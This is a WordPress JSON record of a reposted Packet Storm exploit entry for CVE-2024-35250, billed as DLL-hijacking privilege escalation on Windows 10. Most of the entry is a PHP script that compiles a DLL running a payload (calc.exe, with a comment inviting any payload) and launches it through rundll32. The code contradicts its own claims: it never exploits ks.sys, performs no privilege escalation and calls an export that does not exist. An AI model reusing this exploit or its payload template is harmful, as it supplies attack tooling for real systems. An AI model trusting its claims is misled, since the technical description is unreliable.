{"id":28302,"date":"2025-12-02T15:33:15","date_gmt":"2025-12-02T15:33:15","guid":{"rendered":"http:\/\/localhost\/?p=28302"},"modified":"2025-12-02T15:33:15","modified_gmt":"2025-12-02T15:33:15","slug":"microsoft-windows-10-famille-100190455487-dll-hijacking","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28302","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:48&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212317&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.Microsoft.com                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    POC :\\n    \\n    [+] Dorking \u0130n Google Or Other Search Enggine.\\n    \\n    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. \\n    \\n        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.\\n    \\n    [+] What&#8217;s new in this version?\\n    \\n        Added DLL Hijacking exploit inside the code\\n    \\t\\n        Create a malicious DLL library directly from inside the code\\n    \\n        Use rundll32.exe to automatically load the payload\\n    \\n        Ensure all possible environments are supported (Windows 10 and 11)\\n    \\n        Improved compatibility with different languages\\n    \\n        (Related : https:\/\/packetstorm.news\/files\/id\/182984\/ Related CVE numbers: \\tCVE-2024-35250) .\\n    \\n    \\n    [+] Usage : php poc.php\\n    \\n    [+] PayLoad :\\n    \\n    \\u003c?php\\n    \/**\\n     * \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-35250 \u0641\u064a Windows \u0645\u0639 \u062f\u0639\u0645 \u062c\u0645\u064a\u0639 \u0627\u0644\u0644\u063a\u0627\u062a + DLL Hijacking\\n     *\/\\n    \\n    function getWindowsLCID() {\\n        $output = shell_exec(&#8216;wmic os get locale \/value&#8217;);\\n        preg_match(&#8216;\/Locale=(\\\\w+)\/&#8217;, $output, $matches);\\n        return isset($matches[1]) ? hexdec($matches[1]) : 1033; \/\/ \\n    }\\n    \\n    function localeToLanguage($locale) {\\n        $languages = [\\n            1033 =\\u003e [&#8216;English&#8217;, &#8216;C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\&#8217;], \/\/ en-US\\n            1036 =\\u003e [&#8216;French&#8217;, &#8216;C:\\\\\\\\Utilisateurs\\\\\\\\Public\\\\\\\\&#8217;], \/\/ fr-FR\\n            3082 =\\u003e [&#8216;Spanish&#8217;, &#8216;C:\\\\\\\\Usuarios\\\\\\\\Public\\\\\\\\&#8217;], \/\/ es-ES\\n            1046 =\\u003e [&#8216;Portuguese&#8217;, &#8216;C:\\\\\\\\Usu\u00e1rios\\\\\\\\Public\\\\\\\\&#8217;], \/\/ pt-BR\\n            1031 =\\u003e [&#8216;German&#8217;, &#8216;C:\\\\\\\\Benutzer\\\\\\\\\u00d6ffentlich\\\\\\\\&#8217;], \/\/ de-DE\\n            1049 =\\u003e [&#8216;Russian&#8217;, &#8216;C:\\\\\\\\\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438\\\\\\\\\u041e\u0431\u0449\u0438\u0435\\\\\\\\&#8217;], \/\/ ru-RU\\n            1056 =\\u003e [&#8216;Persian&#8217;, &#8216;C:\\\\\\\\\u06a9\u0627\u0631\u0628\u0631\u0627\u0646\\\\\\\\\u0639\u0645\u0648\u0645\u06cc\\\\\\\\&#8217;], \/\/ fa-IR\\n            1025 =\\u003e [&#8216;Arabic&#8217;, &#8216;C:\\\\\\\\\u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646\\\\\\\\\u0639\u0627\u0645\\\\\\\\&#8217;], \/\/ ar-SA\\n            1101 =\\u003e [&#8216;Hindi&#8217;, &#8216;C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\&#8217;], \/\/ hi-IN\\n            1114 =\\u003e [&#8216;Aramaic&#8217;, &#8216;C:\\\\\\\\\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd\\\\\\\\\u05e6\u05d9\u05d1\u05d5\u05e8\u05d9\\\\\\\\&#8217;], \/\/ \u0627\u0644\u0622\u0631\u0627\u0645\u064a\u0629\\n            1037 =\\u003e [&#8216;Hebrew&#8217;, &#8216;C:\\\\\\\\\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd\\\\\\\\\u05e6\u05d9\u05d1\u05d5\u05e8\u05d9\\\\\\\\&#8217;], \/\/ he-IL\\n            2052 =\\u003e [&#8216;Chinese (Simplified)&#8217;, &#8216;C:\\\\\\\\\u7528\u6237\\\\\\\\\u516c\u5171\\\\\\\\&#8217;], \/\/ zh-CN\\n            1028 =\\u003e [&#8216;Chinese (Traditional)&#8217;, &#8216;C:\\\\\\\\\u4f7f\u7528\u8005\\\\\\\\\u516c\u7528\\\\\\\\&#8217;], \/\/ zh-TW\\n            1041 =\\u003e [&#8216;Japanese&#8217;, &#8216;C:\\\\\\\\\u30e6\u30fc\u30b6\u30fc\\\\\\\\\u30d1\u30d6\u30ea\u30c3\u30af\\\\\\\\&#8217;], \/\/ ja-JP\\n            1042 =\\u003e [&#8216;Korean&#8217;, &#8216;C:\\\\\\\\\uc0ac\uc6a9\uc790\\\\\\\\\uacf5\uc6a9\\\\\\\\&#8217;], \/\/ ko-KR\\n            1054 =\\u003e [&#8216;Thai&#8217;, &#8216;C:\\\\\\\\\u0e1c\u0e39\u0e49\u0e43\u0e0a\u0e49\\\\\\\\\u0e2a\u0e32\u0e18\u0e32\u0e23\u0e13\u0e30\\\\\\\\&#8217;], \/\/ th-TH\\n            1066 =\\u003e [&#8216;Vietnamese&#8217;, &#8216;C:\\\\\\\\Ng\u01b0\u1eddi d\u00f9ng\\\\\\\\C\u00f4ng c\u1ed9ng\\\\\\\\&#8217;], \/\/ vi-VN\\n        ];\\n    \\n        return $languages[$locale] ?? [&#8216;Unknown&#8217;, &#8216;C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\&#8217;]; \/\/ \\n    }\\n    \\n    function getPublicPath() {\\n        $locale = getWindowsLCID();\\n        list($lang, $path) = localeToLanguage($locale);\\n        echo \\&#8221;[+] \u0644\u063a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645: $lang (LCID: $locale)\\\\n\\&#8221;;\\n        return $path;\\n    }\\n    \\n    function is64BitWindows() {\\n        return (PHP_INT_SIZE === 8);\\n    }\\n    \\n    function checkVulnerableDriver() {\\n        $winDir = getenv(&#8216;WINDIR&#8217;);\\n        $driverPath = $winDir . &#8216;\\\\\\\\system32\\\\\\\\drivers\\\\\\\\ks.sys&#8217;;\\n    \\n        if (!file_exists($driverPath)) {\\n            die(\\&#8221;[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 ks.sys\u060c \u0627\u0644\u0646\u0638\u0627\u0645 \u063a\u064a\u0631 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\\\\n\\&#8221;);\\n        }\\n    \\n        echo \\&#8221;[+] ks.sys \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0627\u0644\u0645\u0633\u0627\u0631: $driverPath\\\\n\\&#8221;;\\n        return true;\\n    }\\n    \\n    function getWindowsBuildNumber() {\\n        $output = shell_exec(&#8216;wmic os get BuildNumber \/value&#8217;);\\n        preg_match(&#8216;\/BuildNumber=(\\\\d+)\/&#8217;, $output, $matches);\\n        return $matches[1] ?? null;\\n    }\\n    \\n    function isVulnerableVersion($buildNumber) {\\n        $vulnerableBuilds = range(14393, 19045); \/\/ \u0645\u0646 Windows 10 1607 \u0625\u0644\u0649 Windows 10 22H2\\n        return in_array($buildNumber, $vulnerableBuilds);\\n    }\\n    \\n    function createMaliciousDLL($dllPath) {\\n        $dllCode = \\u003c\\u003c\\u003cEOD\\n    #include \\u003cwindows.h\\u003e\\n    #include \\u003cstdlib.h\\u003e\\n    \\n    BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {\\n        if (ul_reason_for_call == DLL_PROCESS_ATTACH) {\\n            system(\\&#8221;cmd.exe \/c calc.exe\\&#8221;); \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 calc.exe \u0628\u0623\u064a \u062d\u0645\u0648\u0644\u0629 \u062a\u0631\u064a\u062f \u062a\u0646\u0641\u064a\u0630\u0647\u0627\\n        }\\n        return TRUE;\\n    }\\n    EOD;\\n    \\n        file_put_contents(\\&#8221;payload.c\\&#8221;, $dllCode);\\n        shell_exec(\\&#8221;gcc -shared -o $dllPath payload.c -mwindows\\&#8221;);\\n    }\\n    \\n    function exploit() {\\n        if (!is64BitWindows()) {\\n            die(\\&#8221;[X] \u0627\u0644\u0646\u0638\u0627\u0645 \u0644\u064a\u0633 64 \u0628\u062a\u060c \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u063a\u064a\u0631 \u0645\u0645\u0643\u0646.\\\\n\\&#8221;);\\n        }\\n    \\n        if (!checkVulnerableDriver()) {\\n            die(\\&#8221;[X] \u0644\u0627 \u064a\u0645\u0643\u0646 \u0645\u062a\u0627\u0628\u0639\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\\\\n\\&#8221;);\\n        }\\n    \\n        $buildNumber = getWindowsBuildNumber();\\n        if (!$buildNumber || !isVulnerableVersion($buildNumber)) {\\n            die(\\&#8221;[X] \u0625\u0635\u062f\u0627\u0631 Windows \u063a\u064a\u0631 \u0645\u062f\u0639\u0648\u0645: $buildNumber\\\\n\\&#8221;);\\n        }\\n    \\n        echo \\&#8221;[+] \u062a\u0645 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u0633\u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0622\u0646&#8230;\\\\n\\&#8221;;\\n    \\n        $publicPath = getPublicPath();\\n        $payloadPath = $publicPath . \\&#8221;exploit_payload.dll\\&#8221;;\\n    \\n        echo \\&#8221;[+] \u0633\u064a\u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u0633\u0627\u0631: $payloadPath\\\\n\\&#8221;;\\n    \\n        createMaliciousDLL($payloadPath);\\n    \\n        echo \\&#8221;[+] \u062a\u0645 \u0625\u0646\u0634\u0627\u0621 DLL \u0627\u0644\u0636\u0627\u0631\u0629 \u0628\u0646\u062c\u0627\u062d&#8230;\\\\n\\&#8221;;\\n    \\n        $notepad = shell_exec(&#8216;start \/B notepad.exe&#8217;); \/\/ \u062a\u0634\u063a\u064a\u0644 notepad \u0644\u0627\u0633\u062a\u0636\u0627\u0641\u0629 \u0627\u0644\u0640 DLL\\n        sleep(1);\\n    \\n        echo \\&#8221;[+] \u062a\u0645 \u062a\u0634\u063a\u064a\u0644 Notepad\u060c \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062d\u0645\u0648\u0644\u0629&#8230;\\\\n\\&#8221;;\\n        shell_exec(\\&#8221;rundll32 $payloadPath,Inject\\&#8221;); \/\/ \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0639\u0628\u0631 rundll32\\n    }\\n    \\n    exploit();\\n    ?\\u003e\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212317&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212317\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:48&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212317&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | #&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28302","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28302\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:48&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212317&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28302\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317\",\"datePublished\":\"2025-12-02T15:33:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"},\"wordCount\":1209,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\",\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28302","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:48&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212317&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=28302","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28302#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28302"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317","datePublished":"2025-12-02T15:33:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28302"},"wordCount":1209,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28302#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28302","url":"https:\/\/zero.redgem.net\/?p=28302","name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28302#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28302"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28302#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28302"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28302\/revisions"}],